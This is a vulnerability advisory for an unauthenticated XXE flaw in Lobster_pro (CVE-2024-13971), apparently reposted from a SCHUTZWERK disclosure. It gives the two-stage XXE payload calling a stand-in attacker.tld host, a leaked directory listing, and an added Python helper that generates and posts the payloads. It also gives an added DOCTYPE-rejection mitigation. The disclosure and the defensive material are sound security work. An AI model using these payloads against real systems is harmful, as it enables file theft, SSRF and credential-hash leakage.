📄 Lobster_pro Arbitrary File Read / Server-Side Request Forgery

18 May 2026 00:00:00 | Reported by Marcelo Reyes | Type: packetstorm | Source: packetstorm.news | 48 Views

Unauthenticated XXE in Lobster_pro before 4.12.6-GA allows arbitrary file reads and server-side request forgery.

Related

- ATTACKERKB: CVE-2024-13971 (published 30 Apr 2026 12:11)
- Circl: CVE-2024-13971 (30 Apr 2026 16:36)
- CNNVD: Lobster_pro code issue vulnerability (original title: Lobster_pro 代码问题漏洞) (30 Apr 2026 00:00)
- CVE: CVE-2024-13971 (30 Apr 2026 12:11)
- Cvelist: CVE-2024-13971 Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro (30 Apr 2026 12:11)
- EUVD: EUVD-2024-55563 (30 Apr 2026 12:11)
- NVD: CVE-2024-13971 (30 Apr 2026 13:16)
- Positive Technologies: PT-2026-36092 (30 Apr 2026 00:00)
- RedhatCVE: CVE-2024-13971 (18 May 2026 01:57)
- Vulnrichment: CVE-2024-13971 Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro (30 Apr 2026 12:11)

-----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA512
    
    Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro
    ============================================================================================
    
    Unauthenticated attackers can exploit a weakness in the XML parser functionality of
    Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on
    the application server and adjacent network shares, and perform HTTP GET requests to
    arbitrary services.
    
    Metadata
    ========
    
    - Affected product: Lobster_pro
    - Affected version: versions prior to 4.12.6-GA
    - Vendor: Lobster DATA GmbH
    - Problem type(s): CWE-611 Improper Restriction of XML External Entity Reference
    - CVE ID: CVE-2024-13971
    - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-13971
    - CVSS 4.0 score: 7.7
    - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/
    
    Details
    =======
    
    During a recent red team engagement, the no-code platform Lobster_pro was identified as
    part of the customer's internet-facing assets.
    
    The endpoint https://<lobster-pro instance>:443/system/web was found to process XML via
    HTTP POST requests. Sending the following payload and observing the request for map.dtd
    on the attacker-controlled web server confirms that XML External Entities (XXE), here an
    external parameter entity, are resolved and loaded by the application:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE lbsterq [
             <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd">
    %lobster;
    ]>
    <properties>lobster</properties>
    
    Serving the following file as map.dtd, it is possible to retrieve file contents, directory
    listings or HTTP responses via the error message returned by the endpoint. The target is
    read into the parameter entity %cfga; and spliced into a SYSTEM identifier that is not a
    valid URL, so the parser's exception message, and with it the data, ends up in the HTTP
    response:
    
    <!ENTITY % cfga SYSTEM "file:///c:">
    <!ENTITY % eea "<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>">
    %eea;
    %lobsterdata;
    
    The HTTP response contains an error message, embedding the file content or directory
    listing:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <core:ErrorResponse xmlns:core="CORESYSTEM">
       <errorInfo>
          <errorCode>500</errorCode>
          <httpResponseStatus>200</httpResponseStatus>
          <locale>en</locale>
          <errorText>javax.xml.bind.UnmarshalException
     - with linked exception:
    [Exception [EclipseLink-25004] (Eclipse Persistence Services - 2.7.8.qualifier): org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
    Exception Description: An error occurred unmarshalling the document&#xd;
    Internal Exception: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[4,10]
    Message: no protocol: #$Recycle.Bin
    Config.Msi
    [...]
    pagefile.sys
    PerfLogs
    ProgramData
    Program Files
    Program Files (x86)
    Programme
    [...]
    temp
    Users
    Windows
    ]</errorText>
          <errorType>java.io.IOException</errorType>
          <errorLevel>1</errorLevel>
       </errorInfo>
    </core:ErrorResponse>
    
    Due to the way the retrieved content is spliced into the entity declaration, some symbols
    in it (e.g., the percent sign %, which introduces a parameter-entity reference in a DTD)
    lead to recursive entity declarations and thus prevent exfiltration of such files.
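
The two stages above, and the parsing of the error response, as an added example that is not part of SCHUTZWERK's advisory or Lobster_pro's code: a small Python helper that generates the stage-1 document and the map.dtd to be served for an arbitrary target, posts stage 1 (the only step that needs a live target and a web server hosting the DTD; it is defined but not exercised here), and recovers the leaked lines from the `no protocol: #` message. The attacker host `attacker.tld`, the target `file:///c:` and the endpoint path are taken from the advisory; `SAMPLE_RESPONSE` is constructed by abridging the advisory's sample response, not captured from a live system.

```python
"""Helper for the error-based XXE chain described above.

Added example, not code from SCHUTZWERK or Lobster DATA. The attacker host,
the target path and SAMPLE_RESPONSE are constructed inputs.
"""
import re
import urllib.request
import xml.etree.ElementTree as ET


def build_stage1(dtd_url: str) -> str:
    """Document POSTed to /system/web: declares and references one external
    parameter entity, so a resolving parser fetches dtd_url."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE lbsterq [\n"
        f'  <!ENTITY % lobster SYSTEM "{dtd_url}">\n'
        "  %lobster;\n"
        "]>\n"
        "<properties>lobster</properties>\n"
    )


def build_stage2(target: str) -> str:
    """The DTD served at dtd_url. %cfga; is read from `target` (file://,
    http://, or a UNC path) and spliced into a SYSTEM literal that is not a
    valid URL; the parser's exception text ("no protocol: #<content>") then
    carries the data back in-band. &#x25; is the escaped percent sign needed
    to declare a nested parameter entity inside an entity value."""
    return (
        f'<!ENTITY % cfga SYSTEM "{target}">\n'
        "<!ENTITY % eea \"<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>\">\n"
        "%eea;\n"
        "%lobsterdata;\n"
    )


def send_stage1(endpoint: str, dtd_url: str, timeout: float = 10.0) -> str:
    """POST stage 1 and return the raw response body. Needs a live target and
    a web server hosting build_stage2() at dtd_url; not called in this file."""
    req = urllib.request.Request(
        endpoint,
        data=build_stage1(dtd_url).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


LEAK_MARKER = re.compile(r"no protocol: #(.*)", re.S)


def extract_leak(response_xml: str) -> list[str]:
    """Return the leaked lines from a core:ErrorResponse, or [] if the
    response carries no marker (e.g. the target contained a '%' and the DTD
    failed before the SYSTEM literal was built)."""
    root = ET.fromstring(response_xml)
    text = root.findtext(".//errorText") or ""
    m = LEAK_MARKER.search(text)
    if not m:
        return []
    lines = [ln.rstrip("\r") for ln in m.group(1).splitlines()]
    # errorText ends with the closing bracket of the wrapped exception.
    if lines and lines[-1].strip() == "]":
        lines.pop()
    return lines


# Constructed: abridged from the advisory's sample response.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<core:ErrorResponse xmlns:core="CORESYSTEM">
   <errorInfo>
      <errorCode>500</errorCode>
      <httpResponseStatus>200</httpResponseStatus>
      <errorText>javax.xml.bind.UnmarshalException
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services - 2.7.8.qualifier): org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
Exception Description: An error occurred unmarshalling the document&#xd;
Internal Exception: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[4,10]
Message: no protocol: #$Recycle.Bin
Config.Msi
Users
Windows
]</errorText>
      <errorType>java.io.IOException</errorType>
   </errorInfo>
</core:ErrorResponse>
"""

if __name__ == "__main__":
    print(build_stage1("http://attacker.tld/map.dtd"))
    print(build_stage2("file:///c:"))
    print(extract_leak(SAMPLE_RESPONSE))
```

Running the script prints the two payloads and the four leaked lines of the constructed response. Swapping the `target` argument of `build_stage2` for `http://127.0.0.1:8080/` or a `\\host\share\file` UNC path gives the SSRF and SMB variants discussed under Risk; an empty result from `extract_leak` on a real response is the usual sign that the target contained a character such as `%` that broke the generated declaration.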
    
    Risk
    ====
    
    An attacker can use the vulnerability to gather information and, depending on the stored
    data, exfiltrate secrets from the file system and adjacent SMB shares. Furthermore, HTTP
    requests can be used for out-of-band exfiltration and server-side request forgery (SSRF)
    attacks. Utilizing the SMB protocol could also leak the Net-NTLM hash of the account the
    application runs as.
    
    Solution/Mitigation
    ===================
    
    Update to Lobster_pro release 4.12.6-GA or higher.
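
The vendor fix is the update above. For an application's own XML entry points, the generic CWE-611 mitigation is to refuse a DOCTYPE, and with it every entity declaration, before the parser can act on it. The following is an added example, not Lobster_pro's code, showing that gate with Python's standard-library expat parser against the advisory's stage-1 document, a DOCTYPE with only an external subset, and a benign document; `STAGE1`, `EXTERNAL_ONLY` and `BENIGN` are constructed inputs. In the Java StAX/JAXB stack visible in the error message, the equivalent is to set `XMLInputFactory.SUPPORT_DTD` (and `IS_SUPPORTING_EXTERNAL_ENTITIES`) to `false` on the factory whose `XMLStreamReader` is handed to the `Unmarshaller`.

```python
"""DOCTYPE gate for untrusted XML (generic CWE-611 mitigation).

Added example, not Lobster_pro's code. STAGE1, EXTERNAL_ONLY and BENIGN are
constructed inputs; STAGE1 is the advisory's first-stage document.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when untrusted input carries a DOCTYPE / DTD."""


def parse_untrusted(doc: str) -> ET.Element:
    """Parse `doc` only if it declares no DOCTYPE.

    Pass 1 runs expat with a StartDoctypeDecl handler that aborts at once,
    before any entity declaration (internal or external subset) is seen, so
    the %lobster; fetch of the first stage never happens. Pass 2 builds the
    tree from a document that is now known to declare no entities.
    """
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed in untrusted input")

    p.StartDoctypeDeclHandler = on_doctype
    p.Parse(doc, True)
    return ET.fromstring(doc)


def is_accepted(doc: str) -> bool:
    """True if the gate lets `doc` through, False if it is rejected."""
    try:
        parse_untrusted(doc)
        return True
    except DoctypeRejected:
        return False


# Constructed inputs.
STAGE1 = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lbsterq [
  <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd">
  %lobster;
]>
<properties>lobster</properties>
"""

# External subset only, no internal declarations: still a DOCTYPE, still rejected.
EXTERNAL_ONLY = (
    '<!DOCTYPE properties SYSTEM "http://attacker.tld/map.dtd">'
    "<properties>x</properties>"
)

BENIGN = '<?xml version="1.0" encoding="UTF-8"?><properties>lobster</properties>'

if __name__ == "__main__":
    for label, doc in (("stage1", STAGE1), ("external-only", EXTERNAL_ONLY), ("benign", BENIGN)):
        print(label, "accepted" if is_accepted(doc) else "rejected")
```

Rejecting the DOCTYPE outright is preferable to selectively disabling external entities because it also removes internal-entity expansion attacks and the error-based variant shown above, at the cost of refusing legitimate documents that ship a DTD; for an endpoint such as /system/web that has no reason to accept a DTD from the network, that cost is zero.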
    
    Timeline
    ========
    
    - 2024-08-12 Initial contact with vendor
    - 2024-08-14 Vulnerability reported to vendor
    - 2024-08-14 CVE ID requested
    - 2024-08-22 Initial feedback received from vendor: unable to reproduce
    - 2024-08-28 Vulnerability demonstrated in vendor's "Community server"
    - 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro release 4.12.6-GA
    - 2025-07-03 Reserved CVE ID CVE-2024-13971
    - 2026-04-30 Advisory released
    
    Credits
    =======
    
    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.
    -----BEGIN PGP SIGNATURE-----
    
    iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnzRmsaHGFkdmlzb3Jp
    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsvxRAAkVaWMk/lJwfZi0Y0OWpr
    5TQP/YCieTkxpkdiY0PF8dGApB3cp8ysschRAUgWIbeR7f1cj/4hbc3a1GxnZWV7
    2gk1fdQieSdkJs8uBsKz0CeEasMztCI6KcmxWL+CMFHJoH+Q5Gd7MdOh1Og/zVgh
    /UAAfzxihL0Gmx+gl6hpZVYSmqQctD4ogbmdQCU2mEuoHZRGLCzaiOtS8AZbOhvT
    3IvC3ws3cQIAwzD7YH+5V+97cXqbFVnRoNL4YgJ9/pCHXinYZvL1JGL4Ob26/GvD
    QfYqUOgpDsfr9GTZVSZT3S8pUVomMW9+FOjhpcOkRICkJ8cEdLhW5CIoaxweEcwE
    PQSSC5QS5DIfVKgGo4lc0Oe9k3pT/dnH9iEfnV5hnq7+JgapQzqxNaf6BCZJX+ET
    voIVVjyOYyP2Qzs4LSaArWxlcb0XR/DewW9qlvfnea4SfDkrG/hhRK3qBNrC83IR
    IXmBTbp32Sfoh2X1W/frL4BtvIXkDirgF+sttAjoQKN3wVttuKj1JaM/BQ/pDf/N
    pPAwaYzuuuf2Wv3NiBKIgB5tHuHKAQoKQPev7Z6pvDq0sB5ps9SRknIOEmfh/aoE
    7aNztVHs+/6axCVKcuV7+qWv6HUwg4oDp78Lo9r8Oq/9rdbZ3TKtf/KWn4uT+sWw
    Zk6o928sfQFlkXtTXRiGSwE=
    =560Z
    -----END PGP SIGNATURE-----
    
    -- 
    SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
    Zertifiziert / Certified ISO 27001, 9001 and TISAX
    
    Phone +49 731 977 191 0
    
    [email protected] / www.schutzwerk.com
    
    Geschäftsführer / Managing Directors:
    Jakob Pietzka, Michael Schäfer
    
    Amtsgericht Ulm /  HRB 727391
    Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Scores (as of 18 May 2026 00:00, current)

- Vulners AI Score: 6 (Medium risk)
- CVSS 3.1: 7.5
- CVSS 4.0: 7.7
- EPSS: 0.0047
- SSVC: no value shown
- Views: 48